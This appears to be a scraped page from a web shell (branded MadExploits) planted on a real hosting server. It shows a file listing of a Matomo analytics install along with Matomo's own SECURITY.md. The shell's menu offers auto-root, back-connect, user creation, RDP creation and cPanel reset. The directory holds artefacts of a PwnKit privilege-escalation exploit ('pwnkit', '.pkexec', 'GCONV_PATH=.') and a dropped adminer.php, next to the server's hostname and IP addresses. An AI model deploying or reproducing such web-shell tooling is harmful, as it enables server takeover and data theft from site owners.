Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.222.177.138
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
matomo
[ DIR ]
drwxr-xr-x
misc
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
99.68
KB
-rw-r--r--
CONTRIBUTING.md
929
B
-rw-r--r--
DIObject.php
578
B
-rw-r--r--
LEGALNOTICE
8.44
KB
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
LegacyAutoloader.php
828
B
-rw-r--r--
PRIVACY.md
4.51
KB
-rw-r--r--
README.md
5.78
KB
-rw-r--r--
SECURITY.md
1.83
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
console
753
B
-rw-r--r--
favicon.ico
0
B
-rw-r--r--
index.php
712
B
-rw-r--r--
matomo.js
64.3
KB
-rw-r--r--
matomo.php
328
B
-rw-r--r--
offline-service-worker.js
6.23
KB
-rw-r--r--
piwik.js
64.3
KB
-rw-r--r--
piwik.php
2.62
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
robots.txt
770
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SECURITY.md
# Reporting Security Issues ## Security Bug Bounty Program The Matomo Security Bug Bounty Program is designed to encourage security research in Matomo software and to reward those who help us create the safest web analytics platform. Critical security issues will be rewarded up to 5,000 USD. Critical issue in Matomo means an issue in our latest official release at: https://builds.matomo.org/latest.zip as installed on a typical server (and possibly using any of our official plugins by Matomo or InnoCraft from the Marketplace). If you can gain remote code execution on the server (i.e. RCE), or if you're able to delete data with an HTTPS request (i.e. SQL Injection), this may qualify as a Critical issue. (Note: If a Remote Code Execution (RCE) is only available when logged in as a Super User, the issue will qualify as "High" and not "Critical".) High security issues that can cause a direct attack (CSRF, XSS, Auth bypass, etc.) will be rewarded with up to 777 USD. Other issues will typically be rewarded by 242 USD (or more or less depending on the impact.) ## Responsible disclosure by email We encourage you to responsibly report issues via our [Matomo Bug Bounty Program on HackerOne](https://hackerone.com/matomo) or you can also [email us at security@matomo.org](mailto:security@matomo.org?subject=Reporting%20Vulnerability%20in%20Matomo). If you have found a security issue in Matomo please read [our security notes](https://matomo.org/security/) regarding responsible disclosures. ## Improve your Matomo Server Security [Secure Matomo server](https://matomo.org/docs/security/): follow these steps to keep your Matomo data safe. ## Security announcements Please subscribe to [the Changelog](https://matomo.org/changelog/) ([rss feed](https://matomo.org/changelog/feed/)) to be notified of new releases (including security releases).
Close